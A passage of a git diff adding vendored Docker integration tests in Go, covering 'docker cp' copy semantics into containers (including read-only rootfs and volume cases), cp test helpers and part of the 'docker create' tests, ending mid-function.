srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action +// =================================================================================================== +// A | no | - | no | - | no | create file +// B | no | - | no | - | yes | error +// C | no | - | yes | no | - | overwrite file +// D | no | - | yes | yes | - | create file in dst dir +// E | yes | no | no | - | - | create dir, copy contents +// F | yes | no | yes | no | - | error +// G | yes | no | yes | yes | - | copy dir and contents +// H | yes | yes | no | - | - | create dir, copy contents +// I | yes | yes | yes | no | - | error +// J | yes | yes | yes | yes | - | copy dir contents +// + +// A. SRC specifies a file and DST (no trailing path separator) doesn't +// exist. This should create a file with the name DST and copy the +// contents of the source file into it. +func (s *DockerSuite) TestCpToCaseA(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + workDir: "/root", command: makeCatFileCommand("itWorks.txt"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-a") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/root/itWorks.txt") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) +} + +// B. SRC specifies a file and DST (with trailing path separator) doesn't +// exist. This should cause an error because the copy operation cannot +// create a directory when copying a single file. +func (s *DockerSuite) TestCpToCaseB(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("testDir/file1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-b") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstDir := containerCpPathTrailingSep(containerID, "testDir") + + err := runDockerCp(c, srcPath, dstDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) +} + +// C. SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func (s *DockerSuite) TestCpToCaseC(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + command: makeCatFileCommand("file2"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-c") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/root/file2") + + // Ensure the container's file starts with the original content. + c.Assert(containerStartOutputEquals(c, containerID, "file2\n"), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // Should now contain file1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) +} + +// D. SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpToCaseD(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, + command: makeCatFileCommand("/dir1/file1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-d") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstDir := containerCpPath(containerID, "dir1") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + // Should now contain file1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + addContent: true, + command: makeCatFileCommand("/dir1/file1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "dir1") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + // Should now contain file1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) +} + +// E. SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. +func (s *DockerSuite) TestCpToCaseE(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-e") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPath(tmpDir, "dir1") + dstDir := containerCpPath(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// F. SRC specifies a directory and DST exists as a file. This should cause an +// error as it is not possible to overwrite a file with a directory. +func (s *DockerSuite) TestCpToCaseF(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-to-case-f") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPath(tmpDir, "dir1") + dstFile := containerCpPath(containerID, "/root/file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// G. SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpToCaseG(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + command: makeCatFileCommand("dir2/dir1/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-g") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPath(tmpDir, "dir1") + dstDir := containerCpPath(containerID, "/root/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + addContent: true, + command: makeCatFileCommand("/dir2/dir1/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// H. SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpToCaseH(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-h") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." + dstDir := containerCpPath(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/testDir/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// I. SRC specifies a directory's contents only and DST exists as a file. This +// should cause an error as it is not possible to overwrite a file with a +// directory. +func (s *DockerSuite) TestCpToCaseI(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-to-case-i") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." + dstFile := containerCpPath(containerID, "/root/file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// J. SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func (s *DockerSuite) TestCpToCaseJ(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + command: makeCatFileCommand("/dir2/file1-1"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-j") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." + dstDir := containerCpPath(containerID, "/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // Make new destination container. + containerID = makeTestContainer(c, testContainerOptions{ + command: makeCatFileCommand("/dir2/file1-1"), + }) + + dstDir = containerCpPathTrailingSep(containerID, "/dir2") + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + // Should now contain file1-1's contents. + c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) +} + +// The `docker cp` command should also ensure that you cannot +// write to a container rootfs that is marked as read-only. +func (s *DockerSuite) TestCpToErrReadOnlyRootfs(c *check.C) { + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + tmpDir := getTestDir(c, "test-cp-to-err-read-only-rootfs") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + containerID := makeTestContainer(c, testContainerOptions{ + readOnly: true, workDir: "/root", + command: makeCatFileCommand("shouldNotExist"), + }) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/root/shouldNotExist") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrContainerRootfsReadonly error, but got %T: %s", err, err)) + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) +} + +// The `docker cp` command should also ensure that you +// cannot write to a volume that is mounted as read-only. +func (s *DockerSuite) TestCpToErrReadOnlyVolume(c *check.C) { + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + tmpDir := getTestDir(c, "test-cp-to-err-read-only-volume") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + containerID := makeTestContainer(c, testContainerOptions{ + volumes: defaultVolumes(tmpDir), workDir: "/root", + command: makeCatFileCommand("/vol_ro/shouldNotExist"), + }) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/vol_ro/shouldNotExist") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrVolumeReadonly error, but got %T: %s", err, err)) + + // Ensure that dstPath doesn't exist. + c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go new file mode 100644 index 0000000000..45d85ba5d1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go @@ -0,0 +1,39 @@ +// +build !windows + +package main + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/system" + "github.com/go-check/check" +) + +// Check ownership is root, both in non-userns and userns enabled modes +func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + tmpVolDir := getTestDir(c, "test-cp-tmpvol") + containerID := makeTestContainer(c, + testContainerOptions{volumes: []string{fmt.Sprintf("%s:/tmpvol", tmpVolDir)}}) + + tmpDir := getTestDir(c, "test-cp-to-check-ownership") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/tmpvol", "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.IsNil) + + stat, err := system.Stat(filepath.Join(tmpVolDir, "file1")) + c.Assert(err, checker.IsNil) + uid, gid, err := getRootUIDGID() + c.Assert(err, checker.IsNil) + c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Copied file not owned by container root UID")) + c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Copied file not owned by container root GID")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go new file mode 100644 index 0000000000..0501c5d735 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go @@ -0,0 +1,303 @@ +package main + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +type fileType uint32 + +const ( + ftRegular fileType = iota + ftDir + ftSymlink +) + +type fileData struct { + filetype fileType + path string + contents string +} + +func (fd fileData) creationCommand() string { + var command string + + switch fd.filetype { + case ftRegular: + // Don't overwrite the file if it already exists! + command = fmt.Sprintf("if [ ! -f %s ]; then echo %q > %s; fi", fd.path, fd.contents, fd.path) + case ftDir: + command = fmt.Sprintf("mkdir -p %s", fd.path) + case ftSymlink: + command = fmt.Sprintf("ln -fs %s %s", fd.contents, fd.path) + } + + return command +} + +func mkFilesCommand(fds []fileData) string { + commands := make([]string, len(fds)) + + for i, fd := range fds { + commands[i] = fd.creationCommand() + } + + return strings.Join(commands, " && ") +} + +var defaultFileData = []fileData{ + {ftRegular, "file1", "file1"}, + {ftRegular, "file2", "file2"}, + {ftRegular, "file3", "file3"}, + {ftRegular, "file4", "file4"}, + {ftRegular, "file5", "file5"}, + {ftRegular, "file6", "file6"}, + {ftRegular, "file7", "file7"}, + {ftDir, "dir1", ""}, + {ftRegular, "dir1/file1-1", "file1-1"}, + {ftRegular, "dir1/file1-2", "file1-2"}, + {ftDir, "dir2", ""}, + {ftRegular, "dir2/file2-1", "file2-1"}, + {ftRegular, "dir2/file2-2", "file2-2"}, + {ftDir, "dir3", ""}, + {ftRegular, "dir3/file3-1", "file3-1"}, + {ftRegular, "dir3/file3-2", "file3-2"}, + {ftDir, "dir4", ""}, + {ftRegular, "dir4/file3-1", "file4-1"}, + {ftRegular, "dir4/file3-2", "file4-2"}, + {ftDir, "dir5", ""}, + {ftSymlink, "symlinkToFile1", "file1"}, + {ftSymlink, "symlinkToDir1", "dir1"}, + {ftSymlink, "brokenSymlinkToFileX", "fileX"}, + {ftSymlink, "brokenSymlinkToDirX", "dirX"}, + {ftSymlink, "symlinkToAbsDir", "/root"}, +} + +func defaultMkContentCommand() string { + return mkFilesCommand(defaultFileData) +} + +func makeTestContentInDir(c *check.C, dir string) { + for _, fd := range defaultFileData { + path := filepath.Join(dir, filepath.FromSlash(fd.path)) + switch fd.filetype { + case ftRegular: + c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(0666)), checker.IsNil) + case ftDir: + c.Assert(os.Mkdir(path, os.FileMode(0777)), checker.IsNil) + case ftSymlink: + c.Assert(os.Symlink(fd.contents, path), checker.IsNil) + } + } +} + +type testContainerOptions struct { + addContent bool + readOnly bool + volumes []string + workDir string + command string +} + +func makeTestContainer(c *check.C, options testContainerOptions) (containerID string) { + if options.addContent { + mkContentCmd := defaultMkContentCommand() + if options.command == "" { + options.command = mkContentCmd + } else { + options.command = fmt.Sprintf("%s && %s", defaultMkContentCommand(), options.command) + } + } + + if options.command == "" { + options.command = "#(nop)" + } + + args := []string{"run", "-d"} + + for _, volume := range options.volumes { + args = append(args, "-v", volume) + } + + if options.workDir != "" { + args = append(args, "-w", options.workDir) + } + + if options.readOnly { + args = append(args, "--read-only") + } + + args = append(args, "busybox", "/bin/sh", "-c", options.command) + + out, _ := dockerCmd(c, args...) + + containerID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + + exitCode := strings.TrimSpace(out) + if exitCode != "0" { + out, _ = dockerCmd(c, "logs", containerID) + } + c.Assert(exitCode, checker.Equals, "0", check.Commentf("failed to make test container: %s", out)) + + return +} + +func makeCatFileCommand(path string) string { + return fmt.Sprintf("if [ -f %s ]; then cat %s; fi", path, path) +} + +func cpPath(pathElements ...string) string { + localizedPathElements := make([]string, len(pathElements)) + for i, path := range pathElements { + localizedPathElements[i] = filepath.FromSlash(path) + } + return strings.Join(localizedPathElements, string(filepath.Separator)) +} + +func cpPathTrailingSep(pathElements ...string) string { + return fmt.Sprintf("%s%c", cpPath(pathElements...), filepath.Separator) +} + +func containerCpPath(containerID string, pathElements ...string) string { + joined := strings.Join(pathElements, "/") + return fmt.Sprintf("%s:%s", containerID, joined) +} + +func containerCpPathTrailingSep(containerID string, pathElements ...string) string { + return fmt.Sprintf("%s/", containerCpPath(containerID, pathElements...)) +} + +func runDockerCp(c *check.C, src, dst string) (err error) { + c.Logf("running `docker cp %s %s`", src, dst) + + args := []string{"cp", src, dst} + + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, args...)) + if err != nil { + err = fmt.Errorf("error executing `docker cp` command: %s: %s", err, out) + } + + return +} + +func startContainerGetOutput(c *check.C, containerID string) (out string, err error) { + c.Logf("running `docker start -a %s`", containerID) + + args := []string{"start", "-a", containerID} + + out, _, err = runCommandWithOutput(exec.Command(dockerBinary, args...)) + if err != nil { + err = fmt.Errorf("error executing `docker start` command: %s: %s", err, out) + } + + return +} + +func getTestDir(c *check.C, label string) (tmpDir string) { + var err error + + tmpDir, err = ioutil.TempDir("", label) + // unable to make temporary directory + c.Assert(err, checker.IsNil) + + return +} + +func isCpNotExist(err error) bool { + return strings.Contains(err.Error(), "no such file or directory") || strings.Contains(err.Error(), "cannot find the file specified") +} + +func isCpDirNotExist(err error) bool { + return strings.Contains(err.Error(), archive.ErrDirNotExists.Error()) +} + +func isCpNotDir(err error) bool { + return strings.Contains(err.Error(), archive.ErrNotDirectory.Error()) || strings.Contains(err.Error(), "filename, directory name, or volume label syntax is incorrect") +} + +func isCpCannotCopyDir(err error) bool { + return strings.Contains(err.Error(), archive.ErrCannotCopyDir.Error()) +} + +func isCpCannotCopyReadOnly(err error) bool { + return strings.Contains(err.Error(), "marked read-only") +} + +func isCannotOverwriteNonDirWithDir(err error) bool { + return strings.Contains(err.Error(), "cannot overwrite non-directory") +} + +func fileContentEquals(c *check.C, filename, contents string) (err error) { + c.Logf("checking that file %q contains %q\n", filename, contents) + + fileBytes, err := ioutil.ReadFile(filename) + if err != nil { + return + } + + expectedBytes, err := ioutil.ReadAll(strings.NewReader(contents)) + if err != nil { + return + } + + if !bytes.Equal(fileBytes, expectedBytes) { + err = fmt.Errorf("file content not equal - expected %q, got %q", string(expectedBytes), string(fileBytes)) + } + + return +} + +func symlinkTargetEquals(c *check.C, symlink, expectedTarget string) (err error) { + c.Logf("checking that the symlink %q points to %q\n", symlink, expectedTarget) + + actualTarget, err := os.Readlink(symlink) + if err != nil { + return + } + + if actualTarget != expectedTarget { + err = fmt.Errorf("symlink target points to %q not %q", actualTarget, expectedTarget) + } + + return +} + +func containerStartOutputEquals(c *check.C, containerID, contents string) (err error) { + c.Logf("checking that container %q start output contains %q\n", containerID, contents) + + out, err := startContainerGetOutput(c, containerID) + if err != nil { + return + } + + if out != contents { + err = fmt.Errorf("output contents not equal - expected %q, got %q", contents, out) + } + + return +} + +func defaultVolumes(tmpDir string) []string { + if SameHostDaemon.Condition() { + return []string{ + "/vol1", + fmt.Sprintf("%s:/vol2", tmpDir), + fmt.Sprintf("%s:/vol3", filepath.Join(tmpDir, "vol3")), + fmt.Sprintf("%s:/vol_ro:ro", filepath.Join(tmpDir, "vol_ro")), + } + } + + // Can't bind-mount volumes with separate host daemon. + return []string{"/vol1", "/vol2", "/vol3", "/vol_ro:/vol_ro:ro"} +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go new file mode 100644 index 0000000000..515a340976 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go @@ -0,0 +1,513 @@ +package main + +import ( + "encoding/json" + "fmt" + "os" + "reflect" + "strings" + "time" + + "os/exec" + + "io/ioutil" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-connections/nat" + "github.com/go-check/check" +) + +// Make sure we can create a simple container with some args +func (s *DockerSuite) TestCreateArgs(c *check.C) { + // Intentionally clear entrypoint, as the Windows busybox image needs an entrypoint, which breaks this test + out, _ := dockerCmd(c, "create", "--entrypoint=", "busybox", "command", "arg1", "arg2", "arg with space", "-c", "flags") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + ID string + Created time.Time + Path string + Args []string + Image string + }{} + + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + c.Assert(string(cont.Path), checker.Equals, "command", check.Commentf("Unexpected container path. Expected command, received: %s", cont.Path)) + + b := false + expected := []string{"arg1", "arg2", "arg with space", "-c", "flags"} + for i, arg := range expected { + if arg != cont.Args[i] { + b = true + break + } + } + if len(cont.Args) != len(expected) || b { + c.Fatalf("Unexpected args. Expected %v, received: %v", expected, cont.Args) + } + +} + +// Make sure we can grow the container's rootfs at creation time. +func (s *DockerSuite) TestCreateGrowRootfs(c *check.C) { + // Windows and Devicemapper support growing the rootfs + if daemonPlatform != "windows" { + testRequires(c, Devicemapper) + } + out, _ := dockerCmd(c, "create", "--storage-opt", "size=120G", "busybox") + + cleanedContainerID := strings.TrimSpace(out) + + inspectOut := inspectField(c, cleanedContainerID, "HostConfig.StorageOpt") + c.Assert(inspectOut, checker.Equals, "map[size:120G]") +} + +// Make sure we cannot shrink the container's rootfs at creation time. +func (s *DockerSuite) TestCreateShrinkRootfs(c *check.C) { + testRequires(c, Devicemapper) + + // Ensure this fails because of the defaultBaseFsSize is 10G + out, _, err := dockerCmdWithError("create", "--storage-opt", "size=5G", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Container size cannot be smaller than") +} + +// Make sure we can set hostconfig options too +func (s *DockerSuite) TestCreateHostConfig(c *check.C) { + out, _ := dockerCmd(c, "create", "-P", "busybox", "echo") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + HostConfig *struct { + PublishAllPorts bool + } + }{} + + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none")) + c.Assert(cont.HostConfig.PublishAllPorts, check.NotNil, check.Commentf("Expected PublishAllPorts, got false")) +} + +func (s *DockerSuite) TestCreateWithPortRange(c *check.C) { + out, _ := dockerCmd(c, "create", "-p", "3300-3303:3300-3303/tcp", "busybox", "echo") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + HostConfig *struct { + PortBindings map[nat.Port][]nat.PortBinding + } + }{} + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + + c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none")) + c.Assert(cont.HostConfig.PortBindings, checker.HasLen, 4, check.Commentf("Expected 4 ports bindings, got %d", len(cont.HostConfig.PortBindings))) + + for k, v := range cont.HostConfig.PortBindings { + c.Assert(v, checker.HasLen, 1, check.Commentf("Expected 1 ports binding, for the port %s but found %s", k, v)) + c.Assert(k.Port(), checker.Equals, v[0].HostPort, check.Commentf("Expected host port %s to match published port %s", k.Port(), v[0].HostPort)) + + } + +} + +func (s *DockerSuite) TestCreateWithLargePortRange(c *check.C) { + out, _ := dockerCmd(c, "create", "-p", "1-65535:1-65535/tcp", "busybox", "echo") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "inspect", cleanedContainerID) + + containers := []struct { + HostConfig *struct { + PortBindings map[nat.Port][]nat.PortBinding + } + }{} + + err := json.Unmarshal([]byte(out), &containers) + c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) + c.Assert(containers, checker.HasLen, 1) + + cont := containers[0] + c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none")) + c.Assert(cont.HostConfig.PortBindings, checker.HasLen, 65535) + + for k, v := range cont.HostConfig.PortBindings { + c.Assert(v, checker.HasLen, 1) + c.Assert(k.Port(), checker.Equals, v[0].HostPort, check.Commentf("Expected host port %s to match published port %s", k.Port(), v[0].HostPort)) + } + +} + +// "test123" should be printed by docker create + start +func (s *DockerSuite) TestCreateEchoStdout(c *check.C) { + out, _ := dockerCmd(c, "create", "busybox", "echo", "test123") + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "start", "-ai", cleanedContainerID) + c.Assert(out, checker.Equals, "test123\n", check.Commentf("container should've printed 'test123', got %q", out)) + +} + +func (s *DockerSuite) TestCreateVolumesCreated(c *check.C) { + testRequires(c, SameHostDaemon) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + name := "test_create_volume" + dockerCmd(c, "create", "--name", name, "-v", prefix+slash+"foo", "busybox") + + dir, err := inspectMountSourceField(name, prefix+slash+"foo") + c.Assert(err, check.IsNil, check.Commentf("Error getting volume host path: %q", err)) + + if _, err := os.Stat(dir); err != nil && os.IsNotExist(err) { + c.Fatalf("Volume was not created") + } + if err != nil { + c.Fatalf("Error statting volume host path: %q", err) + } + +} + +func (s *DockerSuite) TestCreateLabels(c *check.C) { + name := "test_create_labels" + expected := map[string]string{"k1": "v1", "k2": "v2"} + dockerCmd(c, "create", "--name", name, "-l", "k1=v1", "--label", "k2=v2", "busybox") + + actual := make(map[string]string) + inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + + if !reflect.DeepEqual(expected, actual) { + c.Fatalf("Expected %s got %s", expected, actual) + } +} + +func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) { + imageName := "testcreatebuildlabel" + _, err := buildImage(imageName, + `FROM busybox + LABEL k1=v1 k2=v2`, + true) + + c.Assert(err, check.IsNil) + + name := "test_create_labels_from_image" + expected := map[string]string{"k2": "x", "k3": "v3", "k1": "v1"} + dockerCmd(c, "create", "--name", name, "-l", "k2=x", "--label", "k3=v3", imageName) + + actual := make(map[string]string) + inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + + if !reflect.DeepEqual(expected, actual) { + c.Fatalf("Expected %s got %s", expected, actual) + } +} + +func (s *DockerSuite) TestCreateHostnameWithNumber(c *check.C) { + image := "busybox" + // Busybox on Windows does not implement hostname command + if daemonPlatform == "windows" { + image = WindowsBaseImage + } + out, _ := dockerCmd(c, "run", "-h", "web.0", image, "hostname") + c.Assert(strings.TrimSpace(out), checker.Equals, "web.0", check.Commentf("hostname not set, expected `web.0`, got: %s", out)) + +} + +func (s *DockerSuite) TestCreateRM(c *check.C) { + // Test to make sure we can 'rm' a new container that is in + // "Created" state, and has ever been run. Test "rm -f" too. + + // create a container + out, _ := dockerCmd(c, "create", "busybox") + cID := strings.TrimSpace(out) + + dockerCmd(c, "rm", cID) + + // Now do it again so we can "rm -f" this time + out, _ = dockerCmd(c, "create", "busybox") + + cID = strings.TrimSpace(out) + dockerCmd(c, "rm", "-f", cID) +} + +func (s *DockerSuite) TestCreateModeIpcContainer(c *check.C) { + // Uses Linux specific functionality (--ipc) + testRequires(c, DaemonIsLinux, SameHostDaemon) + + out, _ := dockerCmd(c, "create", "busybox") + id := strings.TrimSpace(out) + + 